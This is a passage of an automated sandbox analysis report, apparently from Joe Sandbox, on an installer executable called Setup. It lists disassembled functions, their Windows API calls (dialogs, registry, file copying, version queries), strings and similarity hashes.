Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00028A00,00000064,0460262C), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(0092DF88), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Section: "%s", xrefs: 004050A5
Skipping section: "%s", xrefs: 004050E1

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424576,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
